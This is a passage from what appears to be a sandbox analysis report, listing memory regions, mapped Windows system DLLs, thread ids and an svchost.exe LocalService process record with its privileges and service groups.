0xfb6910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000fb6790000" filename = "" Region: id = 14556 start_va = 0xfb6920000 end_va = 0xfb6a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000fb6920000" filename = "" Region: id = 14557 start_va = 0xfb6a20000 end_va = 0xfb6b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000fb6a20000" filename = "" Region: id = 14558 start_va = 0xfb6b20000 end_va = 0xfb6c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000fb6b20000" filename = "" Region: id = 14559 start_va = 0xfb6c20000 end_va = 0xfb6f56fff entry_point = 0xfb6c20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 14560 start_va = 0xfb6f60000 end_va = 0xfb6fdffff entry_point = 0x0 region_type = private name = "private_0x0000000fb6f60000" filename = "" Region: id = 14561 start_va = 0xfb6fe0000 end_va = 0xfb70dffff entry_point = 0x0 region_type = private name = "private_0x0000000fb6fe0000" filename = "" Region: id = 14562 start_va = 0xfb70e0000 end_va = 0xfb71dffff entry_point = 0x0 region_type = private name = "private_0x0000000fb70e0000" filename = "" Region: id = 14563 start_va = 0xfb72e0000 end_va = 0xfb73dffff entry_point = 0x0 region_type = private name = "private_0x0000000fb72e0000" filename = "" Region: id = 14564 start_va = 0xfb73e0000 end_va = 0xfb74dffff entry_point = 0x0 region_type = private name = "private_0x0000000fb73e0000" filename = "" Region: id = 14565 start_va = 0xfb74e0000 end_va = 0xfb75dffff entry_point = 0x0 region_type = private name = "private_0x0000000fb74e0000" filename = "" Region: id = 14566 start_va = 0x7df5ff6d0000 end_va = 0x7ff5ff6cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff6d0000" filename = "" Region: id = 14567 start_va = 0x7ff7b2f34000 end_va = 0x7ff7b2f35fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b2f34000" filename = "" Region: id = 14568 start_va = 0x7ff7b2f36000 end_va = 0x7ff7b2f37fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b2f36000" filename = "" Region: id = 14569 start_va = 0x7ff7b2f38000 end_va = 0x7ff7b2f39fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b2f38000" filename = "" Region: id = 14570 start_va = 0x7ff7b2f3c000 end_va = 0x7ff7b2f3dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b2f3c000" filename = "" Region: id = 14571 start_va = 0x7ff7b2f3e000 end_va = 0x7ff7b2f3ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b2f3e000" filename = "" Region: id = 14572 start_va = 0x7ff7b2f40000 end_va = 0x7ff7b303ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b2f40000" filename = "" Region: id = 14573 start_va = 0x7ff7b3040000 end_va = 0x7ff7b3062fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3040000" filename = "" Region: id = 14574 start_va = 0x7ff7b3063000 end_va = 0x7ff7b3064fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3063000" filename = "" Region: id = 14575 start_va = 0x7ff7b3065000 end_va = 0x7ff7b3066fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3065000" filename = "" Region: id = 14576 start_va = 0x7ff7b3067000 end_va = 0x7ff7b3068fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3067000" filename = "" Region: id = 14577 start_va = 0x7ff7b3069000 end_va = 0x7ff7b306afff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3069000" filename = "" Region: id = 14578 start_va = 0x7ff7b306b000 end_va = 0x7ff7b306bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b306b000" filename = "" Region: id = 14579 start_va = 0x7ff7b306e000 end_va = 0x7ff7b306ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b306e000" filename = "" Region: id = 14580 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 14581 start_va = 0x7ffbf2c70000 end_va = 0x7ffbf2cb0fff entry_point = 0x7ffbf2c70000 region_type = mapped_file name = "ssdpsrv.dll" filename = "\\Windows\\System32\\ssdpsrv.dll" (normalized: "c:\\windows\\system32\\ssdpsrv.dll") Region: id = 14582 start_va = 0x7ffbf5200000 end_va = 0x7ffbf5242fff entry_point = 0x7ffbf5200000 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 14583 start_va = 0x7ffbf9c90000 end_va = 0x7ffbf9c97fff entry_point = 0x7ffbf9c90000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 14584 start_va = 0x7ffbf9ca0000 end_va = 0x7ffbf9ca7fff entry_point = 0x7ffbf9ca0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 14585 start_va = 0x7ffbf9d70000 end_va = 0x7ffbf9d79fff entry_point = 0x7ffbf9d70000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 14586 start_va = 0x7ffbfcfa0000 end_va = 0x7ffbfcfb9fff entry_point = 0x7ffbfcfa0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 14587 start_va = 0x7ffbfcfc0000 end_va = 0x7ffbfcfd5fff entry_point = 0x7ffbfcfc0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 14588 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 14589 start_va = 0x7ffbfd740000 end_va = 0x7ffbfd7b1fff entry_point = 0x7ffbfd740000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 14590 start_va = 0x7ffbfdbe0000 end_va = 0x7ffbfdbebfff entry_point = 0x7ffbfdbe0000 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 14591 start_va = 0x7ffbfde60000 end_va = 0x7ffbfde8cfff entry_point = 0x7ffbfde60000 region_type = mapped_file name = "timebrokerserver.dll" filename = "\\Windows\\System32\\TimeBrokerServer.dll" (normalized: "c:\\windows\\system32\\timebrokerserver.dll") Region: id = 14592 start_va = 0x7ffbfe0d0000 end_va = 0x7ffbfe0dafff entry_point = 0x7ffbfe0d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 14593 start_va = 0x7ffbfe0f0000 end_va = 0x7ffbfe127fff entry_point = 0x7ffbfe0f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 14594 start_va = 0x7ffbfeb20000 end_va = 0x7ffbfeb5efff entry_point = 0x7ffbfeb20000 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 14595 start_va = 0x7ffbfec30000 end_va = 0x7ffbfecf7fff entry_point = 0x7ffbfec30000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 14596 start_va = 0x7ffbff210000 end_va = 0x7ffbff236fff entry_point = 0x7ffbff210000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 14597 start_va = 0x7ffbff260000 end_va = 0x7ffbff34dfff entry_point = 0x7ffbff260000 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 14598 start_va = 0x7ffbff5d0000 end_va = 0x7ffbff601fff entry_point = 0x7ffbff5d0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 14599 start_va = 0x7ffbff610000 end_va = 0x7ffbff691fff entry_point = 0x7ffbff610000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 14600 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14601 start_va = 0x7ffbffeb0000 end_va = 0x7ffbffecefff entry_point = 0x7ffbffeb0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 14602 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 14603 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 14604 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 14605 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 14606 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 14607 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 14608 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 14609 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 14610 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 14611 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 14612 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 14613 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14614 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 14615 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 14616 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14617 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14618 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14619 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14620 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14621 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14622 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14623 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 14624 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14625 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1248 os_tid = 0x98c Thread: id = 1249 os_tid = 0x97c Thread: id = 1250 os_tid = 0x90c Thread: id = 1251 os_tid = 0x900 Thread: id = 1252 os_tid = 0x8f0 Thread: id = 1253 os_tid = 0x8ec Thread: id = 1254 os_tid = 0x880 Thread: id = 1255 os_tid = 0x3b4 Thread: id = 1256 os_tid = 0x3b0 Thread: id = 1257 os_tid = 0x364 Process: id = "286" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x545cc000" os_pid = "0x384" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e172" [0xc000000f], "LOCAL" [0x7] Region: id = 15076 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15077 start_va = 0x2386f60000 end_va = 0x2386f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002386f60000" filename = "" Region: id = 15078 start_va = 0x2386f70000 end_va = 0x2386f70fff entry_point = 0x2386f70000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 15079 start_va = 0x2386f80000 end_va = 0x2386f93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002386f80000" filename = "" Region: id = 15080 start_va = 0x2386fa0000 end_va = 0x238701ffff entry_point = 0x0 region_type = private name = "private_0x0000002386fa0000" filename = "" Region: id = 15081 start_va = 0x2387020000 end_va = 0x2387023fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002387020000" filename = "" Region: id = 15082 start_va = 0x2387030000 end_va = 0x2387030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002387030000" filename = "" Region: id = 15083 start_va = 0x2387040000 end_va = 0x2387041fff entry_point = 0x0 region_type = private name = "private_0x0000002387040000" filename = "" Region: id = 15084 start_va = 0x2387050000 end_va = 0x238710dfff entry_point = 0x2387050000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15085 start_va = 0x2387190000 end_va = 0x2387190fff entry_point = 0x0 region_type = private name = "private_0x0000002387190000" filename = "" Region: id = 15086 start_va = 0x23871a0000 end_va = 0x23871a0fff entry_point = 0x0 region_type = private name = "private_0x00000023871a0000" filename = "" Region: id = 15087 start_va = 0x23871b0000 end_va = 0x23871b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023871b0000" filename = "" Region: id = 15088 start_va = 0x23871c0000 end_va = 0x23871c6fff entry_point = 0x0 region_type = private name = "private_0x00000023871c0000" filename = "" Region: id = 15089 start_va = 0x23871d0000 end_va = 0x23871e1fff entry_point = 0x23871d0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 15090 start_va = 0x23871f0000 end_va = 0x23871f4fff entry_point = 0x23871f0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 15091 start_va = 0x2387200000 end_va = 0x23872fffff entry_point = 0x0 region_type = private name = "private_0x0000002387200000" filename = "" Region: id = 15092 start_va = 0x2387300000 end_va = 0x23873bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002387300000" filename = "" Region: id = 15093 start_va = 0x23873c0000 end_va = 0x23873c1fff entry_point = 0x23873c0000 region_type = mapped_file name = "netprofmsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui") Region: id = 15094 start_va = 0x23873d0000 end_va = 0x23873d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023873d0000" filename = "" Region: id = 15095 start_va = 0x23873e0000 end_va = 0x23873e6fff entry_point = 0x0 region_type = private name = "private_0x00000023873e0000" filename = "" Region: id = 15096 start_va = 0x23873f0000 end_va = 0x23873f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000023873f0000" filename = "" Region: id = 15097 start_va = 0x2387400000 end_va = 0x23874fffff entry_point = 0x0 region_type = private name = "private_0x0000002387400000" filename = "" Region: id = 15098 start_va = 0x2387500000 end_va = 0x2387687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002387500000" filename = "" Region: id = 15099 start_va = 0x2387690000 end_va = 0x2387810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002387690000" filename = "" Region: id = 15100 start_va = 0x2387820000 end_va = 0x238791ffff entry_point = 0x0 region_type = private name = "private_0x0000002387820000" filename = "" Region: id = 15101 start_va = 0x2387920000 end_va = 0x2387c56fff entry_point = 0x2387920000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 15102 start_va = 0x2387c60000 end_va = 0x2387d5ffff entry_point = 0x0 region_type = private name = "private_0x0000002387c60000" filename = "" Region: id = 15103 start_va = 0x2387d60000 end_va = 0x2387e5ffff entry_point = 0x0 region_type = private name = "private_0x0000002387d60000" filename = "" Region: id = 15104 start_va = 0x2387e60000 end_va = 0x2387f5ffff entry_point = 0x0 region_type = private name = "private_0x0000002387e60000" filename = "" Region: id = 15105 start_va = 0x2387f60000 end_va = 0x2387fdffff entry_point = 0x0 region_type = private name = "private_0x0000002387f60000" filename = "" Region: id = 15106 start_va = 0x2387fe0000 end_va = 0x23880dffff entry_point = 0x0 region_type = private name = "private_0x0000002387fe0000" filename = "" Region: id = 15107 start_va = 0x23880e0000 end_va = 0x2388155fff entry_point = 0x23880e0000 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 15108 start_va = 0x23881e0000 end_va = 0x23882dffff entry_point = 0x0 region_type = private name = "private_0x00000023881e0000" filename = "" Region: id = 15109 start_va = 0x23882e0000 end_va = 0x23883dffff entry_point = 0x0 region_type = private name = "private_0x00000023882e0000" filename = "" Region: id = 15110 start_va = 0x23883e0000 end_va = 0x23893dffff entry_point = 0x23883e0000 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 15111 start_va = 0x23893e0000 end_va = 0x23894dffff entry_point = 0x0 region_type = private name = "private_0x00000023893e0000" filename = "" Region: id = 15112 start_va = 0x23894e0000 end_va = 0x23895dffff entry_point = 0x0 region_type = private name = "private_0x00000023894e0000" filename = "" Region: id = 15113 start_va = 0x23896e0000 end_va = 0x23897dffff entry_point = 0x0 region_type = private name = "private_0x00000023896e0000" filename = "" Region: id = 15114 start_va = 0x2389800000 end_va = 0x23898fffff entry_point = 0x0 region_type = private name = "private_0x0000002389800000" filename = "" Region: id = 15115 start_va = 0x2389900000 end_va = 0x23899fffff entry_point = 0x0 region_type = private name = "private_0x0000002389900000" filename = "" Region: id = 15116 start_va = 0x2389a00000 end_va = 0x2389afffff entry_point = 0x0 region_type = private name = "private_0x0000002389a00000" filename = "" Region: id = 15117 start_va = 0x2389b00000 end_va = 0x2389bfffff entry_point = 0x0 region_type = private name = "private_0x0000002389b00000" filename = "" Region: id = 15118 start_va = 0x2389c00000 end_va = 0x2389cfffff entry_point = 0x0 region_type = private name = "private_0x0000002389c00000" filename = "" Region: id = 15119 start_va = 0x2389d00000 end_va = 0x2389dfffff entry_point = 0x0 region_type = private name = "private_0x0000002389d00000" filename = "" Region: id = 15120 start_va = 0x2389e00000 end_va = 0x2389efffff entry_point = 0x0 region_type = private name = "private_0x0000002389e00000" filename = "" Region: id = 15121 start_va = 0x2389f00000 end_va = 0x2389ffffff entry_point = 0x0 region_type = private name = "private_0x0000002389f00000" filename = "" Region: id = 15122 start_va = 0x238a000000 end_va = 0x238a0fffff entry_point = 0x0 region_type = private name = "private_0x000000238a000000" filename = "" Region: id = 15123 start_va = 0x238a800000 end_va = 0x238a8fffff entry_point = 0x0 region_type = private name = "private_0x000000238a800000" filename = "" Region: id = 15124 start_va = 0x238a900000 end_va = 0x238a9fffff entry_point = 0x0 region_type = private name = "private_0x000000238a900000" filename = "" Region: id = 15125 start_va = 0x238aa00000 end_va = 0x238aadefff entry_point = 0x238aa00000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 15126 start_va = 0x238aae0000 end_va = 0x238abdffff entry_point = 0x0 region_type = private name = "private_0x000000238aae0000" filename = "" Region: id = 15127 start_va = 0x238abe0000 end_va = 0x238acdffff entry_point = 0x0 region_type = private name = "private_0x000000238abe0000" filename = "" Region: id = 15128 start_va = 0x238ace0000 end_va = 0x238addffff entry_point = 0x0 region_type = private name = "private_0x000000238ace0000" filename = "" Region: id = 15129 start_va = 0x238ae00000 end_va = 0x238aefffff entry_point = 0x0 region_type = private name = "private_0x000000238ae00000" filename = "" Region: id = 15130 start_va = 0x238af00000 end_va = 0x238affffff entry_point = 0x0 region_type = private name = "private_0x000000238af00000" filename = "" Region: id = 15131 start_va = 0x238b000000 end_va = 0x238b7fffff entry_point = 0x238b000000 region_type = mapped_file name = "~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1462094071-1423818996-289466292-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat") Region: id = 15132 start_va = 0x7df5ff2c0000 end_va = 0x7ff5ff2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff2c0000" filename = "" Region: id = 15133 start_va = 0x7ff7b3328000 end_va = 0x7ff7b3329fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3328000" filename = "" Region: id = 15134 start_va = 0x7ff7b332a000 end_va = 0x7ff7b332bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b332a000" filename = "" Region: id = 15135 start_va = 0x7ff7b332c000 end_va = 0x7ff7b332dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b332c000" filename = "" Region: id = 15136 start_va = 0x7ff7b332e000 end_va = 0x7ff7b332ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b332e000" filename = "" Region: id = 15137 start_va = 0x7ff7b3330000 end_va = 0x7ff7b3331fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3330000" filename = "" Region: id = 15138 start_va = 0x7ff7b3332000 end_va = 0x7ff7b3333fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3332000" filename = "" Region: id = 15139 start_va = 0x7ff7b3334000 end_va = 0x7ff7b3335fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3334000" filename = "" Region: id = 15140 start_va = 0x7ff7b3336000 end_va = 0x7ff7b3337fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3336000" filename = "" Region: id = 15141 start_va = 0x7ff7b3338000 end_va = 0x7ff7b3339fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3338000" filename = "" Region: id = 15142 start_va = 0x7ff7b333a000 end_va = 0x7ff7b333bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b333a000" filename = "" Region: id = 15143 start_va = 0x7ff7b333c000 end_va = 0x7ff7b333dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b333c000" filename = "" Region: id = 15144 start_va = 0x7ff7b333e000 end_va = 0x7ff7b333ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b333e000" filename = "" Region: id = 15145 start_va = 0x7ff7b3340000 end_va = 0x7ff7b3341fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3340000" filename = "" Region: id = 15146 start_va = 0x7ff7b3342000 end_va = 0x7ff7b3343fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3342000" filename = "" Region: id = 15147 start_va = 0x7ff7b3346000 end_va = 0x7ff7b3347fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3346000" filename = "" Region: id = 15148 start_va = 0x7ff7b3348000 end_va = 